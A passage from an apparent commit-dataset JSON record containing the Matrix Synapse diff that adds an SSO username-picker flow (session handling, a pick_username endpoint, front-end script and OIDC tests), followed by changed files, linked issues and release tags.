oidc_config.user_mapping_provider.config.extra_attributes.%s: %r\"", - "- % (key, e)", - "- )", - "+ \"invalid jinja template\", path=[\"extra_attributes\", key]", - "+ ) from e", - "@@ -1102,10 +1094,13 @@ class JinjaOidcMappingProvider(OidcMappingProvider[JinjaOidcMappingConfig]):", - " ) -> UserAttributeDict:", - "- localpart = self._config.localpart_template.render(user=userinfo).strip()", - "+ localpart = None", - "+", - "+ if self._config.localpart_template:", - "+ localpart = self._config.localpart_template.render(user=userinfo).strip()", - "- # Ensure only valid characters are included in the MXID.", - "- localpart = map_username_to_mxid_localpart(localpart)", - "+ # Ensure only valid characters are included in the MXID.", - "+ localpart = map_username_to_mxid_localpart(localpart)", - "- # Append suffix integer if last call to this function failed to produce", - "- # a usable mxid.", - "- localpart += str(failures) if failures else \"\"", - "+ # Append suffix integer if last call to this function failed to produce", - "+ # a usable mxid.", - "+ localpart += str(failures) if failures else \"\"", - "diff --git a/synapse/handlers/sso.py b/synapse/handlers/sso.py", - "index f054b66a5..548b02211 100644", - "--- a/synapse/handlers/sso.py", - "+++ b/synapse/handlers/sso.py", - "@@ -15,5 +15,6 @@", - " import logging", - "-from typing import TYPE_CHECKING, Awaitable, Callable, List, Optional", - "+from typing import TYPE_CHECKING, Awaitable, Callable, Dict, List, Optional", - " import attr", - "+from typing_extensions import NoReturn", - "@@ -21,3 +22,3 @@ from twisted.web.http import Request", - "-from synapse.api.errors import RedirectException", - "+from synapse.api.errors import RedirectException, SynapseError", - " from synapse.http.server import respond_with_html", - "@@ -26,2 +27,3 @@ from synapse.types import JsonDict, UserID, contains_invalid_mxid_characters", - " from synapse.util.async_helpers import Linearizer", - "+from synapse.util.stringutils import random_string", - "@@ -42,3 +44,6 @@ class MappingException(Exception):", - " class UserAttributes:", - "- localpart = attr.ib(type=str)", - "+ # the localpart of the mxid that the mapper has assigned to the user.", - "+ # if `None`, the mapper has not picked a userid, and the user should be prompted to", - "+ # enter one.", - "+ localpart = attr.ib(type=Optional[str])", - " display_name = attr.ib(type=Optional[str], default=None)", - "@@ -47,2 +52,31 @@ class UserAttributes:", - "+@attr.s(slots=True)", - "+class UsernameMappingSession:", - "+ \"\"\"Data we track about SSO sessions\"\"\"", - "+", - "+ # A unique identifier for this SSO provider, e.g. \"oidc\" or \"saml\".", - "+ auth_provider_id = attr.ib(type=str)", - "+", - "+ # user ID on the IdP server", - "+ remote_user_id = attr.ib(type=str)", - "+", - "+ # attributes returned by the ID mapper", - "+ display_name = attr.ib(type=Optional[str])", - "+ emails = attr.ib(type=List[str])", - "+", - "+ # An optional dictionary of extra attributes to be provided to the client in the", - "+ # login response.", - "+ extra_login_attributes = attr.ib(type=Optional[JsonDict])", - "+", - "+ # where to redirect the client back to", - "+ client_redirect_url = attr.ib(type=str)", - "+", - "+ # expiry time for the session, in milliseconds", - "+ expiry_time_ms = attr.ib(type=int)", - "+", - "+", - "+# the HTTP cookie used to track the mapping session id", - "+USERNAME_MAPPING_SESSION_COOKIE_NAME = b\"username_mapping_session\"", - "+", - "+", - " class SsoHandler:", - "@@ -51,3 +85,7 @@ class SsoHandler:", - "+ # the time a UsernameMappingSession remains valid for", - "+ _MAPPING_SESSION_VALIDITY_PERIOD_MS = 15 * 60 * 1000", - "+", - " def __init__(self, hs: \"HomeServer\"):", - "+ self._clock = hs.get_clock()", - " self._store = hs.get_datastore()", - "@@ -61,2 +99,5 @@ class SsoHandler:", - "+ # a map from session id to session data", - "+ self._username_mapping_sessions = {} # type: Dict[str, UsernameMappingSession]", - "+", - " def render_error(", - "@@ -208,2 +249,14 @@ class SsoHandler:", - " attributes = await self._call_attribute_mapper(sso_to_matrix_id_mapper)", - "+", - "+ if attributes.localpart is None:", - "+ # the mapper doesn't return a username. bail out with a redirect to", - "+ # the username picker.", - "+ await self._redirect_to_username_picker(", - "+ auth_provider_id,", - "+ remote_user_id,", - "+ attributes,", - "+ client_redirect_url,", - "+ extra_login_attributes,", - "+ )", - "+", - " user_id = await self._register_mapped_user(", - "@@ -245,6 +298,4 @@ class SsoHandler:", - " if not attributes.localpart:", - "- raise MappingException(", - "- \"Error parsing SSO response: SSO mapping provider plugin \"", - "- \"did not return a localpart value\"", - "- )", - "+ # the mapper has not picked a localpart", - "+ return attributes", - "@@ -263,2 +314,55 @@ class SsoHandler:", - "+ async def _redirect_to_username_picker(", - "+ self,", - "+ auth_provider_id: str,", - "+ remote_user_id: str,", - "+ attributes: UserAttributes,", - "+ client_redirect_url: str,", - "+ extra_login_attributes: Optional[JsonDict],", - "+ ) -> NoReturn:", - "+ \"\"\"Creates a UsernameMappingSession and redirects the browser", - "+", - "+ Called if the user mapping provider doesn't return a localpart for a new user.", - "+ Raises a RedirectException which redirects the browser to the username picker.", - "+", - "+ Args:", - "+ auth_provider_id: A unique identifier for this SSO provider, e.g.", - "+ \"oidc\" or \"saml\".", - "+", - "+ remote_user_id: The unique identifier from the SSO provider.", - "+", - "+ attributes: the user attributes returned by the user mapping provider.", - "+", - "+ client_redirect_url: The redirect URL passed in by the client, which we", - "+ will eventually redirect back to.", - "+", - "+ extra_login_attributes: An optional dictionary of extra", - "+ attributes to be provided to the client in the login response.", - "+", - "+ Raises:", - "+ RedirectException", - "+ \"\"\"", - "+ session_id = random_string(16)", - "+ now = self._clock.time_msec()", - "+ session = UsernameMappingSession(", - "+ auth_provider_id=auth_provider_id,", - "+ remote_user_id=remote_user_id,", - "+ display_name=attributes.display_name,", - "+ emails=attributes.emails,", - "+ client_redirect_url=client_redirect_url,", - "+ expiry_time_ms=now + self._MAPPING_SESSION_VALIDITY_PERIOD_MS,", - "+ extra_login_attributes=extra_login_attributes,", - "+ )", - "+", - "+ self._username_mapping_sessions[session_id] = session", - "+ logger.info(\"Recorded registration session id %s\", session_id)", - "+", - "+ # Set the cookie and redirect to the username picker", - "+ e = RedirectException(b\"/_synapse/client/pick_username\")", - "+ e.cookies.append(", - "+ b\"%s=%s; path=/\"", - "+ % (USERNAME_MAPPING_SESSION_COOKIE_NAME, session_id.encode(\"ascii\"))", - "+ )", - "+ raise e", - "+", - " async def _register_mapped_user(", - "@@ -271,5 +375,34 @@ class SsoHandler:", - " ) -> str:", - "+ \"\"\"Register a new SSO user.", - "+", - "+ This is called once we have successfully mapped the remote user id onto a local", - "+ user id, one way or another.", - "+", - "+ Args:", - "+ attributes: user attributes returned by the user mapping provider,", - "+ including a non-empty localpart.", - "+", - "+ auth_provider_id: A unique identifier for this SSO provider, e.g.", - "+ \"oidc\" or \"saml\".", - "+", - "+ remote_user_id: The unique identifier from the SSO provider.", - "+", - "+ user_agent: The user-agent in the HTTP request (used for potential", - "+ shadow-banning.)", - "+", - "+ ip_address: The IP address of the requester (used for potential", - "+ shadow-banning.)", - "+", - "+ Raises:", - "+ a MappingException if the localpart is invalid.", - "+", - "+ a SynapseError with code 400 and errcode Codes.USER_IN_USE if the localpart", - "+ is already taken.", - "+ \"\"\"", - "+", - " # Since the localpart is provided via a potentially untrusted module,", - " # ensure the MXID is valid before registering.", - "- if contains_invalid_mxid_characters(attributes.localpart):", - "+ if not attributes.localpart or contains_invalid_mxid_characters(", - "+ attributes.localpart", - "+ ):", - " raise MappingException(\"localpart is invalid: %s\" % (attributes.localpart,))", - "@@ -328 +461,106 @@ class SsoHandler:", - " )", - "+", - "+ async def check_username_availability(", - "+ self, localpart: str, session_id: str,", - "+ ) -> bool:", - "+ \"\"\"Handle an \"is username available\" callback check", - "+", - "+ Args:", - "+ localpart: desired localpart", - "+ session_id: the session id for the username picker", - "+ Returns:", - "+ True if the username is available", - "+ Raises:", - "+ SynapseError if the localpart is invalid or the session is unknown", - "+ \"\"\"", - "+", - "+ # make sure that there is a valid mapping session, to stop people dictionary-", - "+ # scanning for accounts", - "+", - "+ self._expire_old_sessions()", - "+ session = self._username_mapping_sessions.get(session_id)", - "+ if not session:", - "+ logger.info(\"Couldn't find session id %s\", session_id)", - "+ raise SynapseError(400, \"unknown session\")", - "+", - "+ logger.info(", - "+ \"[session %s] Checking for availability of username %s\",", - "+ session_id,", - "+ localpart,", - "+ )", - "+", - "+ if contains_invalid_mxid_characters(localpart):", - "+ raise SynapseError(400, \"localpart is invalid: %s\" % (localpart,))", - "+ user_id = UserID(localpart, self._server_name).to_string()", - "+ user_infos = await self._store.get_users_by_id_case_insensitive(user_id)", - "+", - "+ logger.info(\"[session %s] users: %s\", session_id, user_infos)", - "+ return not user_infos", - "+", - "+ async def handle_submit_username_request(", - "+ self, request: SynapseRequest, localpart: str, session_id: str", - "+ ) -> None:", - "+ \"\"\"Handle a request to the username-picker 'submit' endpoint", - "+", - "+ Will serve an HTTP response to the request.", - "+", - "+ Args:", - "+ request: HTTP request", - "+ localpart: localpart requested by the user", - "+ session_id: ID of the username mapping session, extracted from a cookie", - "+ \"\"\"", - "+ self._expire_old_sessions()", - "+ session = self._username_mapping_sessions.get(session_id)", - "+ if not session:", - "+ logger.info(\"Couldn't find session id %s\", session_id)", - "+ raise SynapseError(400, \"unknown session\")", - "+", - "+ logger.info(\"[session %s] Registering localpart %s\", session_id, localpart)", - "+", - "+ attributes = UserAttributes(", - "+ localpart=localpart,", - "+ display_name=session.display_name,", - "+ emails=session.emails,", - "+ )", - "+", - "+ # the following will raise a 400 error if the username has been taken in the", - "+ # meantime.", - "+ user_id = await self._register_mapped_user(", - "+ attributes,", - "+ session.auth_provider_id,", - "+ session.remote_user_id,", - "+ request.get_user_agent(\"\"),", - "+ request.getClientIP(),", - "+ )", - "+", - "+ logger.info(\"[session %s] Registered userid %s\", session_id, user_id)", - "+", - "+ # delete the mapping session and the cookie", - "+ del self._username_mapping_sessions[session_id]", - "+", - "+ # delete the cookie", - "+ request.addCookie(", - "+ USERNAME_MAPPING_SESSION_COOKIE_NAME,", - "+ b\"\",", - "+ expires=b\"Thu, 01 Jan 1970 00:00:00 GMT\",", - "+ path=b\"/\",", - "+ )", - "+", - "+ await self._auth_handler.complete_sso_login(", - "+ user_id,", - "+ request,", - "+ session.client_redirect_url,", - "+ session.extra_login_attributes,", - "+ )", - "+", - "+ def _expire_old_sessions(self):", - "+ to_expire = []", - "+ now = int(self._clock.time_msec())", - "+", - "+ for session_id, session in self._username_mapping_sessions.items():", - "+ if session.expiry_time_ms <= now:", - "+ to_expire.append(session_id)", - "+", - "+ for session_id in to_expire:", - "+ logger.info(\"Expiring mapping session %s\", session_id)", - "+ del self._username_mapping_sessions[session_id]", - "diff --git a/synapse/res/username_picker/index.html b/synapse/res/username_picker/index.html", - "new file mode 100644", - "index 000000000..37ea8bb6d", - "--- /dev/null", - "+++ b/synapse/res/username_picker/index.html", - "@@ -0,0 +1,19 @@", - "+", - "+", - "+ ", - "+ Synapse Login", - "+ ", - "+ ", - "+ ", - "+

    ", - "+
    ", - "+ ", - "+ ", - "+ ", - "+
    ", - "+ ", - "+ ", - "+ ", - "+
    ", - "+ ", - "+", - "diff --git a/synapse/res/username_picker/script.js b/synapse/res/username_picker/script.js", - "new file mode 100644", - "index 000000000..416a7c6f4", - "--- /dev/null", - "+++ b/synapse/res/username_picker/script.js", - "@@ -0,0 +1,95 @@", - "+let inputField = document.getElementById(\"field-username\");", - "+let inputForm = document.getElementById(\"form\");", - "+let submitButton = document.getElementById(\"button-submit\");", - "+let message = document.getElementById(\"message\");", - "+", - "+// Submit username and receive response", - "+function showMessage(messageText) {", - "+ // Unhide the message text", - "+ message.classList.remove(\"hidden\");", - "+", - "+ message.textContent = messageText;", - "+};", - "+", - "+function doSubmit() {", - "+ showMessage(\"Success. Please wait a moment for your browser to redirect.\");", - "+", - "+ // remove the event handler before re-submitting the form.", - "+ delete inputForm.onsubmit;", - "+ inputForm.submit();", - "+}", - "+", - "+function onResponse(response) {", - "+ // Display message", - "+ showMessage(response);", - "+", - "+ // Enable submit button and input field", - "+ submitButton.classList.remove('button--disabled');", - "+ submitButton.value = \"Submit\";", - "+};", - "+", - "+let allowedUsernameCharacters = RegExp(\"[^a-z0-9\\\\.\\\\_\\\\=\\\\-\\\\/]\");", - "+function usernameIsValid(username) {", - "+ return !allowedUsernameCharacters.test(username);", - "+}", - "+let allowedCharactersString = \"lowercase letters, digits, ., _, -, /, =\";", - "+", - "+function buildQueryString(params) {", - "+ return Object.keys(params)", - "+ .map(k => encodeURIComponent(k) + '=' + encodeURIComponent(params[k]))", - "+ .join('&');", - "+}", - "+", - "+function submitUsername(username) {", - "+ if(username.length == 0) {", - "+ onResponse(\"Please enter a username.\");", - "+ return;", - "+ }", - "+ if(!usernameIsValid(username)) {", - "+ onResponse(\"Invalid username. Only the following characters are allowed: \" + allowedCharactersString);", - "+ return;", - "+ }", - "+", - "+ // if this browser doesn't support fetch, skip the availability check.", - "+ if(!window.fetch) {", - "+ doSubmit();", - "+ return;", - "+ }", - "+", - "+ let check_uri = 'check?' + buildQueryString({\"username\": username});", - "+ fetch(check_uri, {", - "+ // include the cookie", - "+ \"credentials\": \"same-origin\",", - "+ }).then((response) => {", - "+ if(!response.ok) {", - "+ // for non-200 responses, raise the body of the response as an exception", - "+ return response.text().then((text) => { throw text; });", - "+ } else {", - "+ return response.json();", - "+ }", - "+ }).then((json) => {", - "+ if(json.error) {", - "+ throw json.error;", - "+ } else if(json.available) {", - "+ doSubmit();", - "+ } else {", - "+ onResponse(\"This username is not available, please choose another.\");", - "+ }", - "+ }).catch((err) => {", - "+ onResponse(\"Error checking username availability: \" + err);", - "+ });", - "+}", - "+", - "+function clickSubmit() {", - "+ event.preventDefault();", - "+ if(submitButton.classList.contains('button--disabled')) { return; }", - "+", - "+ // Disable submit button and input field", - "+ submitButton.classList.add('button--disabled');", - "+", - "+ // Submit username", - "+ submitButton.value = \"Checking...\";", - "+ submitUsername(inputField.value);", - "+};", - "+", - "+inputForm.onsubmit = clickSubmit;", - "diff --git a/synapse/res/username_picker/style.css b/synapse/res/username_picker/style.css", - "new file mode 100644", - "index 000000000..745bd4c68", - "--- /dev/null", - "+++ b/synapse/res/username_picker/style.css", - "@@ -0,0 +1,27 @@", - "+input[type=\"text\"] {", - "+ font-size: 100%;", - "+ background-color: #ededf0;", - "+ border: 1px solid #fff;", - "+ border-radius: .2em;", - "+ padding: .5em .9em;", - "+ display: block;", - "+ width: 26em;", - "+}", - "+", - "+.button--disabled {", - "+ border-color: #fff;", - "+ background-color: transparent;", - "+ color: #000;", - "+ text-transform: none;", - "+}", - "+", - "+.hidden {", - "+ display: none;", - "+}", - "+", - "+.tooltip {", - "+ background-color: #f9f9fa;", - "+ padding: 1em;", - "+ margin: 1em 0;", - "+}", - "+", - "diff --git a/synapse/rest/synapse/client/pick_username.py b/synapse/rest/synapse/client/pick_username.py", - "new file mode 100644", - "index 000000000..d3b6803e6", - "--- /dev/null", - "+++ b/synapse/rest/synapse/client/pick_username.py", - "@@ -0,0 +1,88 @@", - "+# -*- coding: utf-8 -*-", - "+# Copyright 2020 The Matrix.org Foundation C.I.C.", - "+#", - "+# Licensed under the Apache License, Version 2.0 (the \"License\");", - "+# you may not use this file except in compliance with the License.", - "+# You may obtain a copy of the License at", - "+#", - "+# http://www.apache.org/licenses/LICENSE-2.0", - "+#", - "+# Unless required by applicable law or agreed to in writing, software", - "+# distributed under the License is distributed on an \"AS IS\" BASIS,", - "+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+# See the License for the specific language governing permissions and", - "+# limitations under the License.", - "+from typing import TYPE_CHECKING", - "+", - "+import pkg_resources", - "+", - "+from twisted.web.http import Request", - "+from twisted.web.resource import Resource", - "+from twisted.web.static import File", - "+", - "+from synapse.api.errors import SynapseError", - "+from synapse.handlers.sso import USERNAME_MAPPING_SESSION_COOKIE_NAME", - "+from synapse.http.server import DirectServeHtmlResource, DirectServeJsonResource", - "+from synapse.http.servlet import parse_string", - "+from synapse.http.site import SynapseRequest", - "+", - "+if TYPE_CHECKING:", - "+ from synapse.server import HomeServer", - "+", - "+", - "+def pick_username_resource(hs: \"HomeServer\") -> Resource:", - "+ \"\"\"Factory method to generate the username picker resource.", - "+", - "+ This resource gets mounted under /_synapse/client/pick_username. The top-level", - "+ resource is just a File resource which serves up the static files in the resources", - "+ \"res\" directory, but it has a couple of children:", - "+", - "+ * \"submit\", which does the mechanics of registering the new user, and redirects the", - "+ browser back to the client URL", - "+", - "+ * \"check\": checks if a userid is free.", - "+ \"\"\"", - "+", - "+ # XXX should we make this path customisable so that admins can restyle it?", - "+ base_path = pkg_resources.resource_filename(\"synapse\", \"res/username_picker\")", - "+", - "+ res = File(base_path)", - "+ res.putChild(b\"submit\", SubmitResource(hs))", - "+ res.putChild(b\"check\", AvailabilityCheckResource(hs))", - "+", - "+ return res", - "+", - "+", - "+class AvailabilityCheckResource(DirectServeJsonResource):", - "+ def __init__(self, hs: \"HomeServer\"):", - "+ super().__init__()", - "+ self._sso_handler = hs.get_sso_handler()", - "+", - "+ async def _async_render_GET(self, request: Request):", - "+ localpart = parse_string(request, \"username\", required=True)", - "+", - "+ session_id = request.getCookie(USERNAME_MAPPING_SESSION_COOKIE_NAME)", - "+ if not session_id:", - "+ raise SynapseError(code=400, msg=\"missing session_id\")", - "+", - "+ is_available = await self._sso_handler.check_username_availability(", - "+ localpart, session_id.decode(\"ascii\", errors=\"replace\")", - "+ )", - "+ return 200, {\"available\": is_available}", - "+", - "+", - "+class SubmitResource(DirectServeHtmlResource):", - "+ def __init__(self, hs: \"HomeServer\"):", - "+ super().__init__()", - "+ self._sso_handler = hs.get_sso_handler()", - "+", - "+ async def _async_render_POST(self, request: SynapseRequest):", - "+ localpart = parse_string(request, \"username\", required=True)", - "+", - "+ session_id = request.getCookie(USERNAME_MAPPING_SESSION_COOKIE_NAME)", - "+ if not session_id:", - "+ raise SynapseError(code=400, msg=\"missing session_id\")", - "+", - "+ await self._sso_handler.handle_submit_username_request(", - "+ request, localpart, session_id.decode(\"ascii\", errors=\"replace\")", - "+ )", - "diff --git a/synapse/types.py b/synapse/types.py", - "index 3ab6bdbe0..c7d4e9580 100644", - "--- a/synapse/types.py", - "+++ b/synapse/types.py", - "@@ -351,3 +351,5 @@ NON_MXID_CHARACTER_PATTERN = re.compile(", - "-def map_username_to_mxid_localpart(username, case_sensitive=False):", - "+def map_username_to_mxid_localpart(", - "+ username: Union[str, bytes], case_sensitive: bool = False", - "+) -> str:", - " \"\"\"Map a username onto a string suitable for a MXID", - "@@ -358,4 +360,4 @@ def map_username_to_mxid_localpart(username, case_sensitive=False):", - " Args:", - "- username (unicode|bytes): username to be mapped", - "- case_sensitive (bool): true if TEST and test should be mapped", - "+ username: username to be mapped", - "+ case_sensitive: true if TEST and test should be mapped", - " onto different mxids", - "diff --git a/tests/handlers/test_oidc.py b/tests/handlers/test_oidc.py", - "index c54f1c579..368d600b3 100644", - "--- a/tests/handlers/test_oidc.py", - "+++ b/tests/handlers/test_oidc.py", - "@@ -15,3 +15,5 @@", - " import json", - "-from urllib.parse import parse_qs, urlparse", - "+import re", - "+from typing import Dict", - "+from urllib.parse import parse_qs, urlencode, urlparse", - "@@ -21,4 +23,9 @@ import pymacaroons", - "+from twisted.web.resource import Resource", - "+", - "+from synapse.api.errors import RedirectException", - " from synapse.handlers.oidc_handler import OidcError", - " from synapse.handlers.sso import MappingException", - "+from synapse.rest.client.v1 import login", - "+from synapse.rest.synapse.client.pick_username import pick_username_resource", - " from synapse.server import HomeServer", - "@@ -795,2 +802,136 @@ class OidcHandlerTestCase(HomeserverTestCase):", - "+ def test_empty_localpart(self):", - "+ \"\"\"Attempts to map onto an empty localpart should be rejected.\"\"\"", - "+ userinfo = {", - "+ \"sub\": \"tester\",", - "+ \"username\": \"\",", - "+ }", - "+ self.get_success(_make_callback_with_userinfo(self.hs, userinfo))", - "+ self.assertRenderedError(\"mapping_error\", \"localpart is invalid: \")", - "+", - "+ @override_config(", - "+ {", - "+ \"oidc_config\": {", - "+ \"user_mapping_provider\": {", - "+ \"config\": {\"localpart_template\": \"{{ user.username }}\"}", - "+ }", - "+ }", - "+ }", - "+ )", - "+ def test_null_localpart(self):", - "+ \"\"\"Mapping onto a null localpart via an empty OIDC attribute should be rejected\"\"\"", - "+ userinfo = {", - "+ \"sub\": \"tester\",", - "+ \"username\": None,", - "+ }", - "+ self.get_success(_make_callback_with_userinfo(self.hs, userinfo))", - "+ self.assertRenderedError(\"mapping_error\", \"localpart is invalid: \")", - "+", - "+", - "+class UsernamePickerTestCase(HomeserverTestCase):", - "+ servlets = [login.register_servlets]", - "+", - "+ def default_config(self):", - "+ config = super().default_config()", - "+ config[\"public_baseurl\"] = BASE_URL", - "+ oidc_config = {", - "+ \"enabled\": True,", - "+ \"client_id\": CLIENT_ID,", - "+ \"client_secret\": CLIENT_SECRET,", - "+ \"issuer\": ISSUER,", - "+ \"scopes\": SCOPES,", - "+ \"user_mapping_provider\": {", - "+ \"config\": {\"display_name_template\": \"{{ user.displayname }}\"}", - "+ },", - "+ }", - "+", - "+ # Update this config with what's in the default config so that", - "+ # override_config works as expected.", - "+ oidc_config.update(config.get(\"oidc_config\", {}))", - "+ config[\"oidc_config\"] = oidc_config", - "+", - "+ # whitelist this client URI so we redirect straight to it rather than", - "+ # serving a confirmation page", - "+ config[\"sso\"] = {\"client_whitelist\": [\"https://whitelisted.client\"]}", - "+ return config", - "+", - "+ def create_resource_dict(self) -> Dict[str, Resource]:", - "+ d = super().create_resource_dict()", - "+ d[\"/_synapse/client/pick_username\"] = pick_username_resource(self.hs)", - "+ return d", - "+", - "+ def test_username_picker(self):", - "+ \"\"\"Test the happy path of a username picker flow.\"\"\"", - "+ client_redirect_url = \"https://whitelisted.client\"", - "+", - "+ # first of all, mock up an OIDC callback to the OidcHandler, which should", - "+ # raise a RedirectException", - "+ userinfo = {\"sub\": \"tester\", \"displayname\": \"Jonny\"}", - "+ f = self.get_failure(", - "+ _make_callback_with_userinfo(", - "+ self.hs, userinfo, client_redirect_url=client_redirect_url", - "+ ),", - "+ RedirectException,", - "+ )", - "+", - "+ # check the Location and cookies returned by the RedirectException", - "+ self.assertEqual(f.value.location, b\"/_synapse/client/pick_username\")", - "+ cookieheader = f.value.cookies[0]", - "+ regex = re.compile(b\"^username_mapping_session=([a-zA-Z]+);\")", - "+ m = regex.search(cookieheader)", - "+ if not m:", - "+ self.fail(\"cookie header %s does not match %s\" % (cookieheader, regex))", - "+", - "+ # introspect the sso handler a bit to check that the username mapping session", - "+ # looks ok.", - "+ session_id = m.group(1).decode(\"ascii\")", - "+ username_mapping_sessions = self.hs.get_sso_handler()._username_mapping_sessions", - "+ self.assertIn(", - "+ session_id, username_mapping_sessions, \"session id not found in map\"", - "+ )", - "+ session = username_mapping_sessions[session_id]", - "+ self.assertEqual(session.remote_user_id, \"tester\")", - "+ self.assertEqual(session.display_name, \"Jonny\")", - "+ self.assertEqual(session.client_redirect_url, client_redirect_url)", - "+", - "+ # the expiry time should be about 15 minutes away", - "+ expected_expiry = self.clock.time_msec() + (15 * 60 * 1000)", - "+ self.assertApproximates(session.expiry_time_ms, expected_expiry, tolerance=1000)", - "+", - "+ # Now, submit a username to the username picker, which should serve a redirect", - "+ # back to the client", - "+ submit_path = f.value.location + b\"/submit\"", - "+ content = urlencode({b\"username\": b\"bobby\"}).encode(\"utf8\")", - "+ chan = self.make_request(", - "+ \"POST\",", - "+ path=submit_path,", - "+ content=content,", - "+ content_is_form=True,", - "+ custom_headers=[", - "+ (\"Cookie\", cookieheader),", - "+ # old versions of twisted don't do form-parsing without a valid", - "+ # content-length header.", - "+ (\"Content-Length\", str(len(content))),", - "+ ],", - "+ )", - "+ self.assertEqual(chan.code, 302, chan.result)", - "+ location_headers = chan.headers.getRawHeaders(\"Location\")", - "+ # ensure that the returned location starts with the requested redirect URL", - "+ self.assertEqual(", - "+ location_headers[0][: len(client_redirect_url)], client_redirect_url", - "+ )", - "+", - "+ # fish the login token out of the returned redirect uri", - "+ parts = urlparse(location_headers[0])", - "+ query = parse_qs(parts.query)", - "+ login_token = query[\"loginToken\"][0]", - "+", - "+ # finally, submit the matrix login token to the login API, which gives us our", - "+ # matrix access token, mxid, and device id.", - "+ chan = self.make_request(", - "+ \"POST\", \"/login\", content={\"type\": \"m.login.token\", \"token\": login_token},", - "+ )", - "+ self.assertEqual(chan.code, 200, chan.result)", - "+ self.assertEqual(chan.json_body[\"user_id\"], \"@bobby:test\")", - "+", - "diff --git a/tests/unittest.py b/tests/unittest.py", - "index 39e5e7b85..af7f752c5 100644", - "--- a/tests/unittest.py", - "+++ b/tests/unittest.py", - "@@ -22,3 +22,3 @@ import logging", - " import time", - "-from typing import Dict, Optional, Type, TypeVar, Union", - "+from typing import Dict, Iterable, Optional, Tuple, Type, TypeVar, Union", - "@@ -385,2 +385,5 @@ class HomeserverTestCase(TestCase):", - " await_result: bool = True,", - "+ custom_headers: Optional[", - "+ Iterable[Tuple[Union[bytes, str], Union[bytes, str]]]", - "+ ] = None,", - " ) -> FakeChannel:", - "@@ -407,2 +410,4 @@ class HomeserverTestCase(TestCase):", - "+ custom_headers: (name, value) pairs to add as request headers", - "+", - " Returns:", - "@@ -422,2 +427,3 @@ class HomeserverTestCase(TestCase):", - " await_result,", - "+ custom_headers,", - " )" - ], - "changed_files": [ - "changelog.d/8942.feature", - "docs/sample_config.yaml", - "synapse/app/homeserver.py", - "synapse/config/oidc_config.py", - "synapse/handlers/oidc_handler.py", - "synapse/handlers/sso.py", - "synapse/res/username_picker/index.html", - "synapse/res/username_picker/script.js", - "synapse/res/username_picker/style.css", - "synapse/rest/synapse/client/pick_username.py", - "synapse/types.py", - "tests/handlers/test_oidc.py", - "tests/unittest.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8942": "Use username picker from synapse core matrix-org/matrix-synapse-saml-mozilla#12 Potential bug when using SAML and workers might result in \"Unsolicited response\" errors #7530", - "8876": "Support multiple SSO identity providers during login/UIA flow #8927 Push login completion down into SsoHandler #8941 Implement a username picker for synapse #8942" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - 